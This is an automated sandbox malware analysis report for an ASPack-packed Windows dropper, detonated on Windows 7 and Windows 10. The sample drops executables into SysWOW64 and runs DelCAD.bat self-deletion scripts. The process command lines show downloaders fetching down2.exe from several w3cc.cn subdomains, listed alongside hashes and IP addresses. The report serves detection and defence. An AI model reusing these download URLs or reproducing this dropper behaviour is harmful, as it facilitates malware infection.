Malware Analysis Report

2025-08-11 01:26

Sample ID 240229-hjjt3she77
Target adf042c909d919ccca72d1bcf7338e71
SHA256 71580c963cd1262975add67f9c585bd6137753653ae1270c5177b0708ba9b0bd
Tags
aspackv2
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

71580c963cd1262975add67f9c585bd6137753653ae1270c5177b0708ba9b0bd

Threat Level: Shows suspicious behavior

The file adf042c909d919ccca72d1bcf7338e71 was classified as: shows suspicious behavior.

Malicious Activity Summary

aspackv2

Executes dropped EXE

ASPack v2.12-2.42

Loads dropped DLL

Checks computer location settings

Drops file in System32 directory

Unsigned PE

Enumerates physical storage devices

Runs ping.exe

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-02-29 06:45

Signatures

Unsigned PE

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-02-29 06:45

Reported

2024-02-29 06:48

Platform

win7-20240221-en

Max time kernel

150s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe"

Signatures

ASPack v2.12-2.42

aspackv2

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Executes dropped EXE

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\yXvPpK.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\CjQlMj.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\McooHs.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\DsaQDn.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\gpVDWz.exe | N/A

Drops file in System32 directory

Description | Indicator | Process | Target
File created | C:\Windows\SysWOW64\yXvPpK.exe | C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe | N/A
File opened for modification | C:\Windows\SysWOW64\yXvPpK.exe | C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe | N/A
File created | C:\Windows\SysWOW64\CjQlMj.exe.tmp | C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe | N/A
File created | C:\Windows\SysWOW64\McooHs.exe.tmp | C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe | N/A
File created | C:\Windows\SysWOW64\DsaQDn.exe.tmp | C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe | N/A
File created | C:\Windows\SysWOW64\DelCAD.bat | C:\Windows\SysWOW64\CjQlMj.exe | N/A
File created | C:\Windows\SysWOW64\gpVDWz.exe.tmp | C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe | N/A
File created | C:\Windows\SysWOW64\DelCAD.bat | C:\Windows\SysWOW64\McooHs.exe | N/A

Enumerates physical storage devices

Runs ping.exe

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A
N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A
N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A
N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 2320 wrote to memory of 2928 | N/A | C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe | C:\Windows\SysWOW64\yXvPpK.exe
PID 2320 wrote to memory of 2928 | N/A | C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe | C:\Windows\SysWOW64\yXvPpK.exe
PID 2320 wrote to memory of 2928 | N/A | C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe | C:\Windows\SysWOW64\yXvPpK.exe
PID 2320 wrote to memory of 2928 | N/A | C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe | C:\Windows\SysWOW64\yXvPpK.exe
PID 2320 wrote to memory of 2552 | N/A | C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe | C:\Windows\SysWOW64\CjQlMj.exe
PID 2320 wrote to memory of 2552 | N/A | C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe | C:\Windows\SysWOW64\CjQlMj.exe
PID 2320 wrote to memory of 2552 | N/A | C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe | C:\Windows\SysWOW64\CjQlMj.exe
PID 2320 wrote to memory of 2552 | N/A | C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe | C:\Windows\SysWOW64\CjQlMj.exe
PID 2320 wrote to memory of 2172 | N/A | C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe | C:\Windows\SysWOW64\McooHs.exe
PID 2320 wrote to memory of 2172 | N/A | C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe | C:\Windows\SysWOW64\McooHs.exe
PID 2320 wrote to memory of 2172 | N/A | C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe | C:\Windows\SysWOW64\McooHs.exe
PID 2320 wrote to memory of 2172 | N/A | C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe | C:\Windows\SysWOW64\McooHs.exe
PID 2320 wrote to memory of 1592 | N/A | C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe | C:\Windows\SysWOW64\DsaQDn.exe
PID 2320 wrote to memory of 1592 | N/A | C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe | C:\Windows\SysWOW64\DsaQDn.exe
PID 2320 wrote to memory of 1592 | N/A | C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe | C:\Windows\SysWOW64\DsaQDn.exe
PID 2320 wrote to memory of 1592 | N/A | C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe | C:\Windows\SysWOW64\DsaQDn.exe
PID 2552 wrote to memory of 1540 | N/A | C:\Windows\SysWOW64\CjQlMj.exe | C:\Windows\SysWOW64\cmd.exe
PID 2552 wrote to memory of 1540 | N/A | C:\Windows\SysWOW64\CjQlMj.exe | C:\Windows\SysWOW64\cmd.exe
PID 2552 wrote to memory of 1540 | N/A | C:\Windows\SysWOW64\CjQlMj.exe | C:\Windows\SysWOW64\cmd.exe
PID 2552 wrote to memory of 1540 | N/A | C:\Windows\SysWOW64\CjQlMj.exe | C:\Windows\SysWOW64\cmd.exe
PID 1540 wrote to memory of 2244 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\PING.EXE
PID 1540 wrote to memory of 2244 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\PING.EXE
PID 1540 wrote to memory of 2244 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\PING.EXE
PID 1540 wrote to memory of 2244 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\PING.EXE
PID 1540 wrote to memory of 588 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\PING.EXE
PID 1540 wrote to memory of 588 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\PING.EXE
PID 1540 wrote to memory of 588 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\PING.EXE
PID 1540 wrote to memory of 588 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\PING.EXE
PID 2320 wrote to memory of 888 | N/A | C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe | C:\Windows\SysWOW64\gpVDWz.exe
PID 2320 wrote to memory of 888 | N/A | C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe | C:\Windows\SysWOW64\gpVDWz.exe
PID 2320 wrote to memory of 888 | N/A | C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe | C:\Windows\SysWOW64\gpVDWz.exe
PID 2320 wrote to memory of 888 | N/A | C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe | C:\Windows\SysWOW64\gpVDWz.exe
PID 2172 wrote to memory of 848 | N/A | C:\Windows\SysWOW64\McooHs.exe | C:\Windows\SysWOW64\cmd.exe
PID 2172 wrote to memory of 848 | N/A | C:\Windows\SysWOW64\McooHs.exe | C:\Windows\SysWOW64\cmd.exe
PID 2172 wrote to memory of 848 | N/A | C:\Windows\SysWOW64\McooHs.exe | C:\Windows\SysWOW64\cmd.exe
PID 2172 wrote to memory of 848 | N/A | C:\Windows\SysWOW64\McooHs.exe | C:\Windows\SysWOW64\cmd.exe
PID 848 wrote to memory of 1268 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\PING.EXE
PID 848 wrote to memory of 1268 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\PING.EXE
PID 848 wrote to memory of 1268 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\PING.EXE
PID 848 wrote to memory of 1268 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\PING.EXE
PID 848 wrote to memory of 2852 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\PING.EXE
PID 848 wrote to memory of 2852 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\PING.EXE
PID 848 wrote to memory of 2852 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\PING.EXE
PID 848 wrote to memory of 2852 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\PING.EXE

Processes

C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe

"C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe"

C:\Windows\SysWOW64\yXvPpK.exe

"C:\Windows\system32\yXvPpK.exe" showautoC:\Windows\system32\eMEgKoPo.dll

C:\Windows\SysWOW64\CjQlMj.exe

"C:\Windows\system32\CjQlMj.exe" C:\Windows\system32\BygFkM2.exe http://x6.w3cc.cn/dw/down2.exe

C:\Windows\SysWOW64\McooHs.exe

"C:\Windows\system32\McooHs.exe" C:\Windows\system32\zcynDy2.exe http://x2.w3cc.cn/dw/down2.exe

C:\Windows\SysWOW64\DsaQDn.exe

"C:\Windows\system32\DsaQDn.exe" C:\Windows\system32\YwLroS2.exe http://x4.w3cc.cn/dw/down2.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c C:\Windows\system32\DelCAD.bat

C:\Windows\SysWOW64\PING.EXE

ping -n 5 127.0.0.1

C:\Windows\SysWOW64\PING.EXE

ping -n 5 127.0.0.1

C:\Windows\SysWOW64\gpVDWz.exe

"C:\Windows\system32\gpVDWz.exe" C:\Windows\system32\kPcInM2.exe http://x2.w3cc.cn/dw/down2.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c C:\Windows\system32\DelCAD.bat

C:\Windows\SysWOW64\PING.EXE

ping -n 5 127.0.0.1

C:\Windows\SysWOW64\PING.EXE

ping -n 5 127.0.0.1

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | x6.w3cc.cn | udp
CN | 182.61.201.92:80 | x6.w3cc.cn | tcp
CN | 182.61.201.50:80 | x6.w3cc.cn | tcp
US | 8.8.8.8:53 | x2.w3cc.cn | udp
CN | 182.61.201.50:80 | x2.w3cc.cn | tcp
CN | 182.61.201.90:80 | x2.w3cc.cn | tcp
CN | 182.61.201.90:80 | x2.w3cc.cn | tcp
CN | 182.61.201.91:80 | x2.w3cc.cn | tcp
US | 8.8.8.8:53 | x4.w3cc.cn | udp
CN | 182.61.201.50:80 | x4.w3cc.cn | tcp
CN | 182.61.201.91:80 | x4.w3cc.cn | tcp
CN | 182.61.201.90:80 | x4.w3cc.cn | tcp
CN | 182.61.201.92:80 | x4.w3cc.cn | tcp
CN | 182.61.201.50:80 | x4.w3cc.cn | tcp
CN | 182.61.201.91:80 | x4.w3cc.cn | tcp
CN | 182.61.201.90:80 | x4.w3cc.cn | tcp
CN | 182.61.201.92:80 | x4.w3cc.cn | tcp

Files

\Windows\SysWOW64\yXvPpK.exe

MD5 adf042c909d919ccca72d1bcf7338e71
SHA1 bf9be4f139b3742d94593f3079f1f8836e5f5bb4
SHA256 71580c963cd1262975add67f9c585bd6137753653ae1270c5177b0708ba9b0bd
SHA512 d8df82387b3b5630f14cb143b5c0e890f49fbd23cc298d8dca1dbe839ce8dc00bb0eb8f75ce546c33242b75e413625fe52f469416b316628f1bf10d3129db173

\Windows\SysWOW64\CjQlMj.exe

MD5 78cd588e48bf05f83ac4d2e5bd3d32e2
SHA1 c96060325a397b397a1d60076ce6e2c11f309a4f
SHA256 5309590bc560b29b521f62e20b8d31ef848501814542939b6b943add30afa85e
SHA512 8cddb7332eec1e036b8466dd07c36557e471e531bfb191254d9c79d1212115378adc0a3111b983c168ce9fe09230ed1797dca4ab30fe16c3f735b98cee273e65

memory/2552-19-0x0000000000400000-0x0000000000418000-memory.dmp

memory/2172-34-0x0000000000400000-0x0000000000418000-memory.dmp

C:\Windows\SysWOW64\DelCAD.bat

MD5 55ddc7c397dac5382bffc27028613cf2
SHA1 cd1ec3db09b2c87dbc12af0cee2e61c2811b7248
SHA256 7af73cc02994867d8df3f7f35ba4b6533566fa66b0a332fcdd6154eaba8268f1
SHA512 bd47ce4081fda66661ac783618e3caf38c86012b669e25e10c376f696c468ac867f955f3ae33e4d9633df7c2ac7e5b9606f17064589343ba562cb8fe954b6026

memory/2552-58-0x0000000000400000-0x0000000000418000-memory.dmp

memory/1592-62-0x0000000000400000-0x0000000000418000-memory.dmp

C:\Windows\SysWOW64\DelCAD.bat

MD5 3b9f74672e6599f4d582d25049c67775
SHA1 b07fea6b6986218b56665ff196295e53a1ab9028
SHA256 60439805131c49c394e0a28e070e4a7ca6956eb3e0c3c7137d16993fa3217311
SHA512 8791d98b7ab472d43595f1c85d4c21916eae04b294d8e1c1ed5685fb94d64b3e7236b1e917c784395f13c9ce9521df14978d3e6ecec21b1bb8ebf0f04569acfb

memory/2172-86-0x0000000000400000-0x0000000000418000-memory.dmp

memory/888-90-0x0000000000400000-0x0000000000418000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-02-29 06:45

Reported

2024-02-29 06:48

Platform

win10v2004-20240226-en

Max time kernel

150s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe"

Signatures

ASPack v2.12-2.42

aspackv2

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe | N/A

Executes dropped EXE

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\SOupMF.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\DMWgpy.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\xBjOcu.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\RMsoSA.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\eytYFB.exe | N/A

Drops file in System32 directory

Description | Indicator | Process | Target
File created | C:\Windows\SysWOW64\DMWgpy.exe.tmp | C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe | N/A
File created | C:\Windows\SysWOW64\xBjOcu.exe.tmp | C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe | N/A
File created | C:\Windows\SysWOW64\RMsoSA.exe.tmp | C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe | N/A
File created | C:\Windows\SysWOW64\DelCAD.bat | C:\Windows\SysWOW64\DMWgpy.exe | N/A
File created | C:\Windows\SysWOW64\eytYFB.exe.tmp | C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe | N/A
File created | C:\Windows\SysWOW64\DelCAD.bat | C:\Windows\SysWOW64\xBjOcu.exe | N/A
File created | C:\Windows\SysWOW64\SOupMF.exe | C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe | N/A
File opened for modification | C:\Windows\SysWOW64\SOupMF.exe | C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe | N/A

Enumerates physical storage devices

Runs ping.exe

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A
N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 2700 wrote to memory of 3060 | N/A | C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe | C:\Windows\SysWOW64\SOupMF.exe
PID 2700 wrote to memory of 3060 | N/A | C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe | C:\Windows\SysWOW64\SOupMF.exe
PID 2700 wrote to memory of 3060 | N/A | C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe | C:\Windows\SysWOW64\SOupMF.exe
PID 2700 wrote to memory of 3096 | N/A | C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe | C:\Windows\SysWOW64\DMWgpy.exe
PID 2700 wrote to memory of 3096 | N/A | C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe | C:\Windows\SysWOW64\DMWgpy.exe
PID 2700 wrote to memory of 3096 | N/A | C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe | C:\Windows\SysWOW64\DMWgpy.exe
PID 2700 wrote to memory of 3884 | N/A | C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe | C:\Windows\SysWOW64\xBjOcu.exe
PID 2700 wrote to memory of 3884 | N/A | C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe | C:\Windows\SysWOW64\xBjOcu.exe
PID 2700 wrote to memory of 3884 | N/A | C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe | C:\Windows\SysWOW64\xBjOcu.exe
PID 2700 wrote to memory of 3108 | N/A | C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe | C:\Windows\SysWOW64\RMsoSA.exe
PID 2700 wrote to memory of 3108 | N/A | C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe | C:\Windows\SysWOW64\RMsoSA.exe
PID 2700 wrote to memory of 3108 | N/A | C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe | C:\Windows\SysWOW64\RMsoSA.exe
PID 3096 wrote to memory of 4372 | N/A | C:\Windows\SysWOW64\DMWgpy.exe | C:\Windows\SysWOW64\cmd.exe
PID 3096 wrote to memory of 4372 | N/A | C:\Windows\SysWOW64\DMWgpy.exe | C:\Windows\SysWOW64\cmd.exe
PID 3096 wrote to memory of 4372 | N/A | C:\Windows\SysWOW64\DMWgpy.exe | C:\Windows\SysWOW64\cmd.exe
PID 4372 wrote to memory of 400 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\PING.EXE
PID 4372 wrote to memory of 400 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\PING.EXE
PID 4372 wrote to memory of 400 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\PING.EXE
PID 2700 wrote to memory of 5104 | N/A | C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe | C:\Windows\SysWOW64\eytYFB.exe
PID 2700 wrote to memory of 5104 | N/A | C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe | C:\Windows\SysWOW64\eytYFB.exe
PID 2700 wrote to memory of 5104 | N/A | C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe | C:\Windows\SysWOW64\eytYFB.exe
PID 3884 wrote to memory of 2060 | N/A | C:\Windows\SysWOW64\xBjOcu.exe | C:\Windows\SysWOW64\cmd.exe
PID 3884 wrote to memory of 2060 | N/A | C:\Windows\SysWOW64\xBjOcu.exe | C:\Windows\SysWOW64\cmd.exe
PID 3884 wrote to memory of 2060 | N/A | C:\Windows\SysWOW64\xBjOcu.exe | C:\Windows\SysWOW64\cmd.exe
PID 2060 wrote to memory of 1928 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\PING.EXE
PID 2060 wrote to memory of 1928 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\PING.EXE
PID 2060 wrote to memory of 1928 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\PING.EXE

Processes

C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe

"C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe"

C:\Windows\SysWOW64\SOupMF.exe

"C:\Windows\system32\SOupMF.exe" showautoC:\Windows\system32\RQYknvIR.dll

C:\Windows\SysWOW64\DMWgpy.exe

"C:\Windows\system32\DMWgpy.exe" C:\Windows\system32\JSNVfa2.exe http://x2.w3cc.cn/dw/down2.exe

C:\Windows\SysWOW64\xBjOcu.exe

"C:\Windows\system32\xBjOcu.exe" C:\Windows\system32\vEzIRa2.exe http://x3.w3cc.cn/dw/down2.exe

C:\Windows\SysWOW64\RMsoSA.exe

"C:\Windows\system32\RMsoSA.exe" C:\Windows\system32\DyeLGo2.exe http://x4.w3cc.cn/dw/down2.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Windows\system32\DelCAD.bat

C:\Windows\SysWOW64\PING.EXE

ping -n 5 127.0.0.1

C:\Windows\SysWOW64\eytYFB.exe

"C:\Windows\system32\eytYFB.exe" C:\Windows\system32\sFAvzS2.exe http://x3.w3cc.cn/dw/down2.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Windows\system32\DelCAD.bat

C:\Windows\SysWOW64\PING.EXE

ping -n 5 127.0.0.1

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp
US | 8.8.8.8:53 | x2.w3cc.cn | udp
US | 8.8.8.8:53 | 180.178.17.96.in-addr.arpa | udp
US | 8.8.8.8:53 | g.bing.com | udp
US | 204.79.197.200:443 | g.bing.com | tcp
CN | 182.61.201.90:80 | x2.w3cc.cn | tcp
US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp
CN | 182.61.201.91:80 | x2.w3cc.cn | tcp
US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp
US | 8.8.8.8:53 | x3.w3cc.cn | udp
CN | 182.61.201.90:80 | x3.w3cc.cn | tcp
CN | 182.61.201.92:80 | x3.w3cc.cn | tcp
US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp
CN | 182.61.201.91:80 | x3.w3cc.cn | tcp
CN | 182.61.201.50:80 | x3.w3cc.cn | tcp
US | 8.8.8.8:53 | x4.w3cc.cn | udp
CN | 182.61.201.50:80 | x4.w3cc.cn | tcp
CN | 182.61.201.92:80 | x4.w3cc.cn | tcp
US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp
CN | 182.61.201.90:80 | x4.w3cc.cn | tcp
CN | 182.61.201.50:80 | x4.w3cc.cn | tcp
CN | 182.61.201.90:80 | x4.w3cc.cn | tcp
CN | 182.61.201.91:80 | x4.w3cc.cn | tcp
CN | 182.61.201.91:80 | x4.w3cc.cn | tcp
CN | 182.61.201.92:80 | x4.w3cc.cn | tcp
US | 8.8.8.8:53 | 214.80.50.20.in-addr.arpa | udp

Files

C:\Windows\SysWOW64\SOupMF.exe

MD5 adf042c909d919ccca72d1bcf7338e71
SHA1 bf9be4f139b3742d94593f3079f1f8836e5f5bb4
SHA256 71580c963cd1262975add67f9c585bd6137753653ae1270c5177b0708ba9b0bd
SHA512 d8df82387b3b5630f14cb143b5c0e890f49fbd23cc298d8dca1dbe839ce8dc00bb0eb8f75ce546c33242b75e413625fe52f469416b316628f1bf10d3129db173

C:\Windows\SysWOW64\DMWgpy.exe

MD5 78cd588e48bf05f83ac4d2e5bd3d32e2
SHA1 c96060325a397b397a1d60076ce6e2c11f309a4f
SHA256 5309590bc560b29b521f62e20b8d31ef848501814542939b6b943add30afa85e
SHA512 8cddb7332eec1e036b8466dd07c36557e471e531bfb191254d9c79d1212115378adc0a3111b983c168ce9fe09230ed1797dca4ab30fe16c3f735b98cee273e65

memory/3096-17-0x0000000000400000-0x0000000000418000-memory.dmp

memory/3884-31-0x0000000000400000-0x0000000000418000-memory.dmp

memory/3096-49-0x0000000000400000-0x0000000000418000-memory.dmp

C:\Windows\SysWOW64\DelCAD.bat

MD5 9c439a87b83755cde8511cf65e13e54e
SHA1 a72df147498f15d16d4004f73733d2602390e981
SHA256 d7c7639aa7fbe036c11bf35908fb2aa26171902482bb250233af19cd8f655bf3
SHA512 c483a77a2496f2daca73613be8a317c6fbf92de9cb569a0dd75a27f30fa4d6f251a4a1d26e3808716128cf4f48c72cbd81b5380c9b2d981be9be300eb49155eb

memory/3108-52-0x0000000000400000-0x0000000000418000-memory.dmp

memory/3884-70-0x0000000000400000-0x0000000000418000-memory.dmp

C:\Windows\SysWOW64\DelCAD.bat

MD5 544926ed36528740dfc1d64a602e6d5c
SHA1 7837ae9e7da6054b79b1f1cbe810d838ed0ee3c5
SHA256 6e7bd49e44ffa47502cceb6fcf39dcb048d716cbe9f95b360c145b5fea64eec7
SHA512 8425d3c4282b576878c5ecc2a327634399338e626fd738192d2c766f8ecfa7f4bf539b476757c9174f111b6b7d108a39f90aaffcdc4b93ffda65b5594cb7210b

memory/5104-73-0x0000000000400000-0x0000000000418000-memory.dmp